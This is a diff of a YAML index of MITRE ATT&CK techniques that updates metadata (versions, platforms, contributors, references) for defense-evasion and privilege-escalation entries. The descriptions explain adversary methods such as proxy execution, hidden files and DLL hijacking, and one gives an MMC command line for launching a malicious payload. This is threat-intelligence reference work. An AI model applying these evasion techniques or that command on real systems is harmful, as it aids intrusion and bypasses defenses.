       - 'Module: Module Load'
       - 'Process: Process Creation'
-      x_mitre_system_requirements:
-      - Microsoft Core XML Services (MSXML) or access to wmic.exe
       x_mitre_defense_bypassed:
       - Anti-virus
       - Digital Certificate Validation
       - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_system_requirements:
+      - Microsoft Core XML Services (MSXML) or access to wmic.exe
+      type: attack-pattern
+      id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3
+      created: '2018-10-17T00:14:20.652Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1220
+        external_id: T1220
+      - source_name: Reaqta MSXSL Spearphishing MAR 2018
+        description: Admin. (2018, March 2). Spear-phishing campaign leveraging on
+          MSXSL. Retrieved July 3, 2018.
+        url: https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/
+      - source_name: Twitter SquiblyTwo Detection APR 2018
+        description: Desimone, J. (2018, April 18). Status Update. Retrieved September
+          12, 2024.
+        url: https://x.com/dez_/status/986614411711442944
+      - source_name: LOLBAS Wmic
+        description: LOLBAS. (n.d.). Wmic.exe. Retrieved July 31, 2019.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Wmic/
+      - source_name: Microsoft msxsl.exe
+        description: Microsoft. (n.d.). Command Line Transformation Utility (msxsl.exe).
+          Retrieved July 3, 2018.
+        url: https://www.microsoft.com/download/details.aspx?id=21714
+      - source_name: Penetration Testing Lab MSXSL July 2017
+        description: netbiosX. (2017, July 6). AppLocker Bypass – MSXSL. Retrieved
+          July 3, 2018.
+        url: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
+      - source_name: XSL Bypass Mar 2019
+        description: Singh, A. (2019, March 14). MSXSL.EXE and WMIC.EXE — A Way to
+          Proxy Code Execution. Retrieved August 2, 2019.
+        url: https://medium.com/@threathuntingteam/msxsl-exe-and-wmic-exe-a-way-to-proxy-code-execution-8d524f642b75
+      - source_name: Microsoft XSLT Script Mar 2017
+        description: Wenzel, M. et al. (2017, March 30). XSLT Stylesheet Scripting
+          Using <msxsl:script>. Retrieved July 3, 2018.
+        url: https://docs.microsoft.com/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1220
     atomic_tests: []
   T1564.001:
@@ -13754,7 +14042,7 @@ defense-evasion:
         description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
           Retrieved July 10, 2017.'
         source_name: WireLurker
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T22:32:25.985Z'
       name: 'Hide Artifacts: Hidden Files and Directories'
       description: |-
         Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).
@@ -13782,48 +14070,11 @@ defense-evasion:
       - Host forensic analysis
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1564.001
     atomic_tests: []
   T1578.001:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
-      type: attack-pattern
-      created: '2020-06-09T15:33:13.563Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.001
-        url: https://attack.mitre.org/techniques/T1578/001
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS Cloud Trail Backup API
-        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
-        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
-          Retrieved April 27, 2020.
-      - source_name: Azure - Monitor Logs
-        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
-        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
-          Retrieved May 1, 2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      - source_name: GCP - Creating and Starting a VM
-        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
-        description: Google. (2020, April 23). Creating and Starting a VM instance.
-          Retrieved May 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T15:53:44.870Z'
       name: Create Snapshot
       description: |-
         An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
@@ -13832,6 +14083,9 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
 
@@ -13840,20 +14094,51 @@ defense-evasion:
         In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
 
         Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the <code>gcloud compute instances create</code> command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the <code>"sourceSnapshot":</code> parameter pointed to <code>"global/snapshots/[BOOT_SNAPSHOT_NAME]</code>.(Citation: GCP - Creating and Starting a VM)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Snapshot: Snapshot Creation'
       - 'Snapshot: Snapshot Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+      created: '2020-06-09T15:33:13.563Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/001
+        external_id: T1578.001
+      - source_name: AWS Cloud Trail Backup API
+        description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+          Retrieved April 27, 2020.
+        url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+      - source_name: GCP - Creating and Starting a VM
+        description: Google. (2020, April 23). Creating and Starting a VM instance.
+          Retrieved May 1, 2020.
+        url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure - Monitor Logs
+        description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+          Retrieved May 1, 2020.
+        url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -13910,6 +14195,7 @@ defense-evasion:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -13920,13 +14206,12 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -13985,11 +14270,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -14029,8 +14313,10 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -14038,13 +14324,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -14075,9 +14361,6 @@ defense-evasion:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1480.001:
@@ -14138,7 +14421,7 @@ defense-evasion:
         Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
 
         Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-04T14:52:51.290Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Environmental Keying
       x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -14160,11 +14443,10 @@ defense-evasion:
       - Static File Analysis
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.004:
     technique:
-      modified: '2024-02-14T21:56:34.831Z'
+      modified: '2024-09-12T15:27:29.615Z'
       name: 'Hide Artifacts: NTFS File Attributes'
       description: |-
         Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
@@ -14231,8 +14513,8 @@ defense-evasion:
           Retrieved March 21, 2018.
         url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
       - source_name: Microsoft File Streams
-        description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa364404
+        description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
       - source_name: Oddvar Moe ADS2 Apr 2018
         description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
           and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -14250,7 +14532,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.004
     atomic_tests: []
   T1055.001:
@@ -14353,12 +14634,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
   T1556:
     technique:
-      modified: '2024-04-11T21:51:44.851Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Modify Authentication Process
       description: |-
         Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -14371,6 +14651,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Chris Ross @xorrior
       x_mitre_deprecated: false
@@ -14407,17 +14688,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
       - Network
-      - Azure AD
-      - Google Workspace
       - IaaS
-      - Office 365
       - SaaS
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Process: Process Access'
@@ -14463,9 +14744,6 @@ defense-evasion:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1216:
     technique:
@@ -14503,7 +14781,7 @@ defense-evasion:
         behavior may be abused by adversaries to execute malicious files that could
         bypass application control and signature validation on systems.(Citation:
         GitHub Ultimate AppLocker Bypass List)'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:43:46.045Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Signed Script Proxy Execution
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -14522,7 +14800,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216
     atomic_tests: []
   T1556.004:
@@ -14553,7 +14830,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-12-14T23:14:26.107Z'
       name: Network Device Authentication
       description: |-
         Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -14577,12 +14854,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -14666,7 +14941,6 @@ defense-evasion:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1601.002:
     technique:
@@ -14688,7 +14962,7 @@ defense-evasion:
         url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
         description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
           IOS devices. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:49:02.660Z'
       name: Downgrade System Image
       description: "Adversaries may install an older version of the operating system
         of a network device to weaken security.  Older operating system versions on
@@ -14722,12 +14996,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -14779,9 +15051,8 @@ defense-evasion:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1211:
@@ -14850,7 +15121,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1127:
     technique:
@@ -14897,7 +15167,7 @@ defense-evasion:
         legitimate certificates that allow them to execute on a system and proxy execution
         of malicious code through a trusted process that effectively bypasses application
         control solutions.'
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:37.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Trusted Developer Utilities Proxy Execution
       x_mitre_detection: |-
@@ -14910,12 +15180,13 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_data_sources:
       - 'Command: Command Execution'
+      - 'Module: Module Load'
+      - 'Process: Process Metadata'
       - 'Process: Process Creation'
       x_mitre_defense_bypassed:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127
     atomic_tests: []
   T1218.014:
@@ -14994,7 +15265,7 @@ defense-evasion:
         mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
         CLSID payload with the following command: <code>mmc.exe -Embedding C:\\path\\to\\test.msc</code>.(Citation:
         abusing_com_reg)"
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:41:16.112Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: MMC
       x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -15016,7 +15287,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.010:
     technique:
@@ -15059,7 +15329,7 @@ defense-evasion:
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-11-29T15:56:50.370Z'
       name: Process Argument Spoofing
       description: |-
         Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -15083,8 +15353,6 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.012:
     technique:
@@ -15132,7 +15400,7 @@ defense-evasion:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -15170,8 +15438,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 privilege-escalation:
@@ -15220,7 +15486,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -15272,29 +15538,28 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -15341,7 +15606,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -15373,8 +15638,8 @@ privilege-escalation:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -15388,6 +15653,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -15400,11 +15669,14 @@ privilege-escalation:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
